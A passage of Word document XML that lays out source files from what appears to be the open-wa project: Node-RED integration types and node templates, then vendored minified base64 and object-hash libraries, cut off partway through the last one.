        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:cs="Courier New" w:eastAsia="Courier New" w:hAnsi="Courier New"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
        <w:t xml:space="preserve">  const store = getSocketStore(globalContext)</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:cs="Courier New" w:eastAsia="Courier New" w:hAnsi="Courier New"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
        <w:t xml:space="preserve">  if(store[socketClientId]) {</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:cs="Courier New" w:eastAsia="Courier New" w:hAnsi="Courier New"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
        <w:t xml:space="preserve">    delete store[socketClientId]</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:cs="Courier New" w:eastAsia="Courier New" w:hAnsi="Courier New"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
        <w:t xml:space="preserve">    globalContext.set(CLIENT_STORE, {</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:cs="Courier New" w:eastAsia="Courier New" w:hAnsi="Courier New"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
        <w:t xml:space="preserve">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//client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nodeInit;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integrations/node-red/src/nodes/owa-server/owa-server.ts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integrations/node-red/src/nodes/shared/common.ts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Shared types that don't require external dependencies.</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:cs="Courier New" w:eastAsia="Courier New" w:hAnsi="Courier New"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
        <w:t xml:space="preserve"> * Used by both the editor (browser) and runtime (Node.js) builds.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const CLIENT_STORE = "waClients"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EasyAPIServer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EASY API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API Key for the instance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interface ServerSubscriber {</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:cs="Courier New" w:eastAsia="Courier New" w:hAnsi="Courier New"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
        <w:t xml:space="preserve">    server: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integrations/node-red/src/nodes/shared/common.ts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integrations/node-red/src/nodes/shared/types.ts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Runtime-only types that depend on @open-wa/socket-client.</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:cs="Courier New" w:eastAsia="Courier New" w:hAnsi="Courier New"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
        <w:t xml:space="preserve"> * Re-exports common types for backward compatibility.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import { SocketClient } from '@open-wa/socket-client';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Re-export everything from common for backward compat</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:cs="Courier New" w:eastAsia="Courier New" w:hAnsi="Courier New"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
        <w:t xml:space="preserve">export { CLIENT_STORE, type EasyAPIServer, type ServerSubscriber } from './common';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ClientStore {</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:cs="Courier New" w:eastAsia="Courier New" w:hAnsi="Courier New"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
        <w:t xml:space="preserve">    [id : string] : SocketClient</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integrations/node-red/src/nodes/shared/types.ts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integrations/node-red/utils/templates/blank-0/node-type.ts.mustache ---</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:cs="Courier New" w:eastAsia="Courier New" w:hAnsi="Courier New"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
        <w:t xml:space="preserve">import { NodeInitializer } from "node-red";</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:cs="Courier New" w:eastAsia="Courier New" w:hAnsi="Courier New"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
        <w:t xml:space="preserve">import { &lt;%NodeTypePascalCase%&gt;Node, &lt;%NodeTypePascalCase%&gt;NodeDef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nodeInit: NodeInitializer = (RED): void =&gt; {</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:cs="Courier New" w:eastAsia="Courier New" w:hAnsi="Courier New"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
        <w:t xml:space="preserve">  function &lt;%NodeTypePascalCase%&gt;NodeConstructor(</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:cs="Courier New" w:eastAsia="Courier New" w:hAnsi="Courier New"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
        <w:t xml:space="preserve">    this: &lt;%NodeTypePascalCase%&gt;Node,</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:cs="Courier New" w:eastAsia="Courier New" w:hAnsi="Courier New"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
        <w:t xml:space="preserve">    config: &lt;%NodeTypePascalCase%&gt;NodeDef</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RED.nodes.createNode(this,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this.on("input", (msg, send, done) =&gt; {</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:cs="Courier New" w:eastAsia="Courier New" w:hAnsi="Courier New"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
        <w:t xml:space="preserve">      // Node-RED &lt;1.0: this.send(msg);</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:cs="Courier New" w:eastAsia="Courier New" w:hAnsi="Courier New"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
        <w:t xml:space="preserve">      // Node-RED &gt;=1.0: send(msg); done();</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:cs="Courier New" w:eastAsia="Courier New" w:hAnsi="Courier New"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
        <w:t xml:space="preserve">      // For more info: https://nodered.org/blog/2019/09/20/node-done</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:cs="Courier New" w:eastAsia="Courier New" w:hAnsi="Courier New"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
        <w:t xml:space="preserve">      const sendAnyNR = send || this.send;</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:cs="Courier New" w:eastAsia="Courier New" w:hAnsi="Courier New"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
        <w:t xml:space="preserve">      sendAnyNR(msg);</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:cs="Courier New" w:eastAsia="Courier New" w:hAnsi="Courier New"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
        <w:t xml:space="preserve">      if (done) {</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RED.nodes.registerType("&lt;%NodeTypeKebabCase%&gt;", &lt;%NodeTypePascalCase%&gt;NodeConstructor);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nodeInit;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integrations/node-red/utils/templates/blank-0/node-type.ts.mustache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integrations/node-red/utils/templates/blank/node-type.ts.mustache ---</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:cs="Courier New" w:eastAsia="Courier New" w:hAnsi="Courier New"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
        <w:t xml:space="preserve">import { NodeInitializer } from "node-red";</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:cs="Courier New" w:eastAsia="Courier New" w:hAnsi="Courier New"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
        <w:t xml:space="preserve">import { &lt;%NodeTypePascalCase%&gt;Node, &lt;%NodeTypePascalCase%&gt;NodeDef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nodeInit: NodeInitializer = (RED): void =&gt; {</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:cs="Courier New" w:eastAsia="Courier New" w:hAnsi="Courier New"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
        <w:t xml:space="preserve">  function &lt;%NodeTypePascalCase%&gt;NodeConstructor(</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:cs="Courier New" w:eastAsia="Courier New" w:hAnsi="Courier New"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
        <w:t xml:space="preserve">    this: &lt;%NodeTypePascalCase%&gt;Node,</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:cs="Courier New" w:eastAsia="Courier New" w:hAnsi="Courier New"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
        <w:t xml:space="preserve">    config: &lt;%NodeTypePascalCase%&gt;NodeDef</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RED.nodes.createNode(this, config);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this.on("input", (msg, send, done) =&gt; {</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:cs="Courier New" w:eastAsia="Courier New" w:hAnsi="Courier New"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
        <w:t xml:space="preserve">      send(msg);</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:cs="Courier New" w:eastAsia="Courier New" w:hAnsi="Courier New"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
        <w:t xml:space="preserve">      done();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RED.nodes.registerType("&lt;%NodeTypeKebabCase%&gt;", &lt;%NodeTypePascalCase%&gt;NodeConstructor);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nodeInit;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integrations/node-red/utils/templates/blank/node-type.ts.mustache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integrations/node-red/utils/templates/config/node-type.ts.mustache ---</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:cs="Courier New" w:eastAsia="Courier New" w:hAnsi="Courier New"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
        <w:t xml:space="preserve">import { NodeInitializer } from "node-red";</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:cs="Courier New" w:eastAsia="Courier New" w:hAnsi="Courier New"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
        <w:t xml:space="preserve">import { &lt;%NodeTypePascalCase%&gt;Node, &lt;%NodeTypePascalCase%&gt;NodeDef } from "./modules/types";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const nodeInit: NodeInitializer = (RED): void =&gt; {</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:cs="Courier New" w:eastAsia="Courier New" w:hAnsi="Courier New"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
        <w:t xml:space="preserve">  function &lt;%NodeTypePascalCase%&gt;NodeConstructor(</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:cs="Courier New" w:eastAsia="Courier New" w:hAnsi="Courier New"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
        <w:t xml:space="preserve">    this: &lt;%NodeTypePascalCase%&gt;Node,</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:cs="Courier New" w:eastAsia="Courier New" w:hAnsi="Courier New"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
        <w:t xml:space="preserve">    config: &lt;%NodeTypePascalCase%&gt;NodeDef</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:cs="Courier New" w:eastAsia="Courier New" w:hAnsi="Courier New"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
        <w:t xml:space="preserve">  ): void {</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:cs="Courier New" w:eastAsia="Courier New" w:hAnsi="Courier New"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
        <w:t xml:space="preserve">    RED.nodes.createNode(this,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RED.nodes.registerType("&lt;%NodeTypeKebabCase%&gt;", &lt;%NodeTypePascalCase%&gt;NodeConstructor);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nodeInit;</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integrations/node-red/utils/templates/config/node-type.ts.mustache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packages/core/src/transport/assets/base64.js ---</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:cs="Courier New" w:eastAsia="Courier New" w:hAnsi="Courier New"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
        <w:t xml:space="preserve">!function(e,o){"object"==typeof exports&amp;&amp;"undefined"!=typeof module?module.exports=o(e):"function"==typeof define&amp;&amp;define.amd?define(o):o(e)}("undefined"!=typeof self?self:"undefined"!=typeof window?window:"undefined"!=typeof global?global:this,function(global){"use strict";global=global||{};var _Base64=global.Base64,version="2.5.2",buffer;if("undefined"!=typeof module&amp;&amp;module.exports)try{buffer=eval("require('buffer').Buffer")}catch(e){buffer=void 0}var b64chars="ABCDEFGHIJKLMNOPQRSTUVWXYZabcdefghijklmnopqrstuvwxyz0123456789+/",b64tab=function(e){for(var o={},r=0,t=e.length;r&lt;t;r++)o[e.charAt(r)]=r;return o}(b64chars),fromCharCode=String.fromCharCode,cb_utob=function(e){if(e.length&lt;2)return(o=e.charCodeAt(0))&lt;128?e:o&lt;2048?fromCharCode(192|o&gt;&gt;&gt;6)+fromCharCode(128|63&amp;o):fromCharCode(224|o&gt;&gt;&gt;12&amp;15)+fromCharCode(128|o&gt;&gt;&gt;6&amp;63)+fromCharCode(128|63&amp;o);var o=65536+1024*(e.charCodeAt(0)-55296)+(e.charCodeAt(1)-56320);return fromCharCode(240|o&gt;&gt;&gt;18&amp;7)+fromCharCode(128|o&gt;&gt;&gt;12&amp;63)+fromCharCode(128|o&gt;&gt;&gt;6&amp;63)+fromCharCode(128|63&amp;o)},re_utob=/[\uD800-\uDBFF][\uDC00-\uDFFFF]|[^\x00-\x7F]/g,utob=function(e){return e.replace(re_utob,cb_utob)},cb_encode=function(e){var o=[0,2,1][e.length%3],r=e.charCodeAt(0)&lt;&lt;16|(e.length&gt;1?e.charCodeAt(1):0)&lt;&lt;8|(e.length&gt;2?e.charCodeAt(2):0);return[b64chars.charAt(r&gt;&gt;&gt;18),b64chars.charAt(r&gt;&gt;&gt;12&amp;63),o&gt;=2?"=":b64chars.charAt(r&gt;&gt;&gt;6&amp;63),o&gt;=1?"=":b64chars.charAt(63&amp;r)].join("")},btoa=global.btoa?function(e){return global.btoa(e)}:function(e){return e.replace(/[\s\S]{1,3}/g,cb_encode)},_encode=function(e){return"[object Uint8Array]"===Object.prototype.toString.call(e)?e.toString("base64"):btoa(utob(String(e)))},encode=function(e,o){return o?_encode(String(e)).replace(/[+\/]/g,function(e){return"+"==e?"-":"_"}).replace(/=/g,""):_encode(e)},encodeURI=function(e){return encode(e,!0)},re_btou=/[\xC0-\xDF][\x80-\xBF]|[\xE0-\xEF][\x80-\xBF]{2}|[\xF0-\xF7][\x80-\xBF]{3}/g,cb_btou=function(e){switch(e.length){case 4:var o=((7&amp;e.charCodeAt(0))&lt;&lt;18|(63&amp;e.charCodeAt(1))&lt;&lt;12|(63&amp;e.charCodeAt(2))&lt;&lt;6|63&amp;e.charCodeAt(3))-65536;return fromCharCode(55296+(o&gt;&gt;&gt;10))+fromCharCode(56320+(1023&amp;o));case 3:return fromCharCode((15&amp;e.charCodeAt(0))&lt;&lt;12|(63&amp;e.charCodeAt(1))&lt;&lt;6|63&amp;e.charCodeAt(2));default:return fromCharCode((31&amp;e.charCodeAt(0))&lt;&lt;6|63&amp;e.charCodeAt(1))}},btou=function(e){return e.replace(re_btou,cb_btou)},cb_decode=function(e){var o=e.length,r=o%4,t=(o&gt;0?b64tab[e.charAt(0)]&lt;&lt;18:0)|(o&gt;1?b64tab[e.charAt(1)]&lt;&lt;12:0)|(o&gt;2?b64tab[e.charAt(2)]&lt;&lt;6:0)|(o&gt;3?b64tab[e.charAt(3)]:0),n=[fromCharCode(t&gt;&gt;&gt;16),fromCharCode(t&gt;&gt;&gt;8&amp;255),fromCharCode(255&amp;t)];return n.length-=[0,0,2,1][r],n.join("")},_atob=global.atob?function(e){return global.atob(e)}:function(e){return e.replace(/\S{1,4}/g,cb_decode)},atob=function(e){return _atob(String(e).replace(/[^A-Za-z0-9\+\/]/g,""))},_decode=buffer?buffer.from&amp;&amp;Uint8Array&amp;&amp;buffer.from!==Uint8Array.from?function(e){return(e.constructor===buffer.constructor?e:buffer.from(e,"base64")).toString()}:function(e){return(e.constructor===buffer.constructor?e:new buffer(e,"base64")).toString()}:function(e){return btou(_atob(e))},decode=function(e){return _decode(String(e).replace(/[-_]/g,function(e){return"-"==e?"+":"/"}).replace(/[^A-Za-z0-9\+\/]/g,""))},noConflict=function(){var e=global.Base64;return global.Base64=_Base64,e};if(global.Base64={VERSION:version,atob:atob,btoa:btoa,fromBase64:decode,toBase64:encode,utob:utob,encode:encode,encodeURI:encodeURI,btou:btou,decode:decode,noConflict:noConflict,__buffer__:buffer},"function"==typeof Object.defineProperty){var noEnum=function(e){return{value:e,enumerable:!1,writable:!0,configurable:!0}};global.Base64.extendString=function(){Object.defineProperty(String.prototype,"fromBase64",noEnum(function(){return decode(this)})),Object.defineProperty(String.prototype,"toBase64",noEnum(function(e){return encode(this,e)})),Object.defineProperty(String.prototype,"toBase64URI",noEnum(function(){return encode(this,!0)}))}}return global.Meteor&amp;&amp;(Base64=global.Base64),"undefined"!=typeof module&amp;&amp;module.exports?module.exports.Base64=global.Base64:"function"==typeof define&amp;&amp;define.amd&amp;&amp;define([],function(){return global.Base64}),{Base64:global.Base64}});</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:cs="Courier New" w:eastAsia="Courier New" w:hAnsi="Courier New"/>
          <w:b/>
          <w:bCs/>
          <w:color w:val="666666"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
        <w:t xml:space="preserve">--- END FILE: packages/core/src/transport/assets/base64.js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packages/core/src/transport/assets/hash.js ---</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:cs="Courier New" w:eastAsia="Courier New" w:hAnsi="Courier New"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
        <w:t xml:space="preserve">!function(e){if("object"==typeof exports)module.exports=e();else if("function"==typeof define&amp;&amp;define.amd)define(e);else{var t;"undefined"!=typeof window?t=window:"undefined"!=typeof global?t=global:"undefined"!=typeof self&amp;&amp;(t=self),t.objectHash=e()}}(function(){return function o(i,u,a){function s(n,e){if(!u[n]){if(!i[n]){var t="function"==typeof require&amp;&amp;require;if(!e&amp;&amp;t)return t(n,!0);if(f)return f(n,!0);throw new Error("Cannot find module '"+n+"'")}var r=u[n]={exports:{}};i[n][0].call(r.exports,function(e){var t=i[n][1][e];return s(t||e)},r,r.exports,o,i,u,a)}return u[n].exports}for(var f="function"==typeof require&amp;&amp;require,e=0;e&lt;a.length;e++)s(a[e]);return s}({1:[function(w,b,m){(function(e,t,f,n,r,o,i,u,a){"use strict";var s=w("crypto");function c(e,t){return function(e,t){var n;n="passthrough"!==t.algorithm?s.createHash(t.algorithm):new y;void 0===n.write&amp;&amp;(n.write=n.update,n.end=n.update);g(t,n).dispatch(e),n.update||n.end("");if(n.digest)return n.digest("buffer"===t.encoding?void 0:t.encoding);var r=n.read();return"buffer"!==t.encoding?r.toString(t.encoding):r}(e,t=h(e,t))}(m=b.exports=c).sha1=function(e){return c(e)},m.keys=function(e){return c(e,{excludeValues:!0,algorithm:"sha1",encoding:"hex"})},m.MD5=function(e){return c(e,{algorithm:"md5",encoding:"hex"})},m.keysMD5=function(e){return c(e,{algorithm:"md5",encoding:"hex",excludeValues:!0})};var l=s.getHashes?s.getHashes().slice():["sha1","md5"];l.push("passthrough");var d=["buffer","hex","binary","base64"];function h(e,t){t=t||{};var n={};if(n.algorithm=t.algorithm||"sha1",n.encoding=t.encoding||"hex",n.excludeValues=!!t.excludeValues,n.algorithm=n.algorithm.toLowerCase(),n.encoding=n.encoding.toLowerCase(),n.ignoreUnknown=!0===t.ignoreUnknown,n.respectType=!1!==t.respectType,n.respectFunctionNames=!1!==t.respectFunctionNames,n.respectFunctionProperties=!1!==t.respectFunctionProperties,n.unorderedArrays=!0===t.unorderedArrays,n.unorderedSets=!1!==t.unorderedSets,n.unorderedObjects=!1!==t.unorderedObjects,n.replacer=t.replacer||void 0,n.excludeKeys=t.excludeKeys||void 0,void 0===e)throw new Error("Object argument required.");for(var r=0;r&lt;l.length;++r)l[r].toLowerCase()===n.algorithm.toLowerCase()&amp;&amp;(n.algorithm=l[r]);if(-1===l.indexOf(n.algorithm))throw new Error('Algorithm "'+n.algorithm+'"  not supported. supported values: '+l.join(", "));if(-1===d.indexOf(n.encoding)&amp;&amp;"passthrough"!==n.algorithm)throw new Error('Encoding "'+n.encoding+'"  not supported. supported values: '+d.join(", "));return n}function p(e){if("function"==typeof e){return null!=/^function\s+\w*\s*\(\s*\)\s*{\s+\[native code\]\s+}$/i.exec(Function.prototype.toString.call(e))}}function g(u,t,a){a=a||[];function s(e){return t.update?t.update(e,"utf8"):t.write(e,"utf8")}return{dispatch:function(e){u.replacer&amp;&amp;(e=u.replacer(e));var t=typeof e;return null===e&amp;&amp;(t="null"),this["_"+t](e)},_object:function(t){var e=Object.prototype.toString.call(t),n=/\[object (.*)\]/i.exec(e);n=(n=n?n[1]:"unknown:["+e+"]").toLowerCase();var r;if(0&lt;=(r=a.indexOf(t)))return this.dispatch("[CIRCULAR:"+r+"]");if(a.push(t),void 0!==f&amp;&amp;f.isBuffer&amp;&amp;f.isBuffer(t))return s("buffer:"),s(t);if("object"===n||"function"===n||"asyncfunction"===n){var o=Object.keys(t);u.unorderedObjects&amp;&amp;(o=o.sort()),!1===u.respectType||p(t)||o.splice(0,0,"prototype","__proto__","constructor"),u.excludeKeys&amp;&amp;(o=o.filter(function(e){return!u.excludeKeys(e)})),s("object:"+o.length+":");var i=this;return o.forEach(function(e){i.dispatch(e),s(":"),u.excludeValues||i.dispatch(t[e]),s(",")})}if(!this["_"+n]){if(u.ignoreUnknown)return s("["+n+"]");throw new Error('Unknown object type "'+n+'"')}this["_"+n](t)},_array:function(e,t){t=void 0!==t?t:!1!==u.unorderedArrays;var n=this;if(s("array:"+e.length+":"),!t||e.length&lt;=1)return e.forEach(function(e){return n.dispatch(e)});var r=[],o=e.map(function(e){var t=new y,n=a.slice();return g(u,t,n).dispatch(e),r=r.concat(n.slice(a.length)),t.read().toString()});return a=a.concat(r),o.sort(),this._array(o,!1)},_date:function(e){return s("date:"+e.toJSON())},_symbol:function(e){return s("symbol:"+e.toString())},_error:function(e){return s("error:"+e.toString())},_boolean:function(e){return s("bool:"+e.toString())},_string:function(e){s("string:"+e.length+":"),s(e.toString())},_function:function(e){s("fn:"),p(e)?this.dispatch("[native]"):this.dispatch(e.toString()),!1!==u.respectFunctionNames&amp;&amp;this.dispatch("function-name:"+String(e.name)),u.respectFunctionProperties&amp;&amp;this._object(e)},_number:function(e){return s("number:"+e.toString())},_xml:function(e){return s("xml:"+e.toString())},_null:function(){return s("Null")},_undefined:function(){return s("Undefined")},_regexp:function(e){return s("regex:"+e.toString())},_uint8array:function(e){return s("uint8array:"),this.dispatch(Array.prototype.slice.call(e))},_uint8clampedarray:function(e){return s("uint8clampedarray:"),this.dispatch(Array.prototype.slice.call(e))},_int8array:function(e){return s("uint8array:"),this.dispatch(Array.prototype.slice.call(e))},_uint16array:function(e){return s("uint16array:"),this.dispatch(Array.prototype.slice.call(e))},_int16array:function(e){return s("uint16array:"),this.dispatch(Array.prototype.slice.call(e))},_uint32array:function(e){return s("uint32array:"),this.dispatch(Array.prototype.slice.call(e))},_int32array:function(e){return s("uint32array:"),this.dispatch(Array.prototype.slice.call(e))},_float32array:function(e){return s("float32array:"),this.dispatch(Array.prototype.slice.call(e))},_float64array:function(e){return s("float64array:"),this.dispatch(Array.prototype.slice.call(e))},_arraybuffer:function(e){return s("arraybuffer:"),this.dispatch(new Uint8Array(e))},_url:function(e){return s("url:"+e.toString())},_map:function(e){s("map:");var t=Array.from(e);return this._array(t,!1!==u.unorderedSets)},_set:function(e){s("set:");var t=Array.from(e);return this._array(t,!1!==u.unorderedSets)},_blob:function(){if(u.ignoreUnknown)return s("[blob]");throw Error('Hashing Blob objects is currently not supported\n(see https://github.com/puleos/object-hash/issues/26)\nUse "options.replacer" or "options.ignoreUnknown"\n')},_domwindow:function(){return s("domwindow")},_process:function(){return s("process")},_timer:function(){return s("timer")},_pipe:function(){return s("pipe")},_tcp:function(){return s("tcp")},_udp:function(){return s("udp")},_tty:function(){return s("tty")},_statwatcher:function(){return s("statwatcher")},_securecontext:function(){return s("securecontext")},_connection:function(){return s("connection")},_zlib:function(){return s("zlib")},_context:function(){return s("context")},_nodescript:function(){return s("nodescript")},_httpparser:function(){return s("httpparser")},_dataview:function(){return s("dataview")},_signal:function(){return s("signal")},_fsevent:function(){return s("fsevent")},_tlswrap:function(){return s("tlswrap")}}}function y(){return{buf:"",write:function(e){this.buf+=e},end:function(e){this.buf+=e},read:function(){return this.buf}}}m.writeToStream=function(e,t,n){return void 0===n&amp;&amp;(n=t,t={}),g(t=h(e,t),n).dispatch(e)}}).call(this,w("lYpoI2"),"undefined"!=typeof self?self:"undefined"!=typeof window?window:{},w("buffer").Buffer,arguments[3],arguments[4],arguments[5],arguments[6],"/fake_794fcf4d.js","/")},{buffer:3,crypto:5,lYpoI2:10}],2:[function(e,t,f){(function(e,t,n,r,o,i,u,a,s){!function(e){"use strict";var f="undefined"!=typeof Uint8Array?Uint8Array:Array,n="+".charCodeAt(0),r="/".charCodeAt(0),o="0".charCodeAt(0),i="a".charCodeAt(0),u="A".charCodeAt(0),a="-".charCodeAt(0),s="_".charCodeAt(0);function c(e){var t=e.charCodeAt(0);return t===n||t===a?62:t===r||t===s?63:t&lt;o?-1:t&lt;o+10?t-o+26+26:t&lt;u+26?t-u:t&lt;i+26?t-i+26:void 0}e.toByteArray=function(e){var t,n,r,o,i;if(0&lt;e.length%4)throw new Error("Invalid string. Length must be a multiple of 4");var u=e.length;o="="===e.charAt(u-2)?2:"="===e.charAt(u-1)?1:0,i=new f(3*e.length/4-o),n=0&lt;o?e.length-4:e.length;var a=0;function s(e){i[a++]=e}for(t=0;t&lt;n;t+=4,0)s((16711680&amp;(r=c(e.charAt(t))&lt;&lt;18|c(e.charAt(t+1))&lt;&lt;12|c(e.charAt(t+2))&lt;&lt;6|c(e.charAt(t+3))))&gt;&gt;16),s((65280&amp;r)&gt;&gt;8),s(255&amp;r);return 2==o?s(255&amp;(r=c(e.charAt(t))&lt;&lt;2|c(e.charAt(t+1))&gt;&gt;4)):1==o&amp;&amp;(s((r=c(e.charAt(t))&lt;&lt;10|c(e.charAt(t+1))&lt;&lt;4|c(e.charAt(t+2))&gt;&gt;2)&gt;&gt;8&amp;255),s(255&amp;r)),i},e.fromByteArray=function(e){var t,n,r,o,i=e.length%3,u="";function a(e){return"ABCDEFGHIJKLMNOPQRSTUVWXYZabcdefghijklmnopqrstuvwxyz0123456789+/".charAt(e)}for(t=0,r=e.length-i;t&lt;r;t+=3)n=(e[t]&lt;&lt;16)+(e[t+1]&lt;&lt;8)+e[t+2],u+=a((o=n)&gt;&gt;18&amp;63)+a(o&gt;&gt;12&amp;63)+a(o&gt;&gt;6&amp;63)+a(63&amp;o);switch(i){case 1:u+=a((n=e[e.length-1])&gt;&gt;2),u+=a(n&lt;&lt;4&amp;63),u+="==";break;case 2:u+=a((n=(e[e.length-2]&lt;&lt;8)+e[e.length-1])&gt;&gt;10),u+=a(n&gt;&gt;4&amp;63),u+=a(n&lt;&lt;2&amp;63),u+="="}return u}}(void 0===f?this.base64js={}:f)}).call(this,e("lYpoI2"),"undefined"!=typeof self?self:"undefined"!=typeof 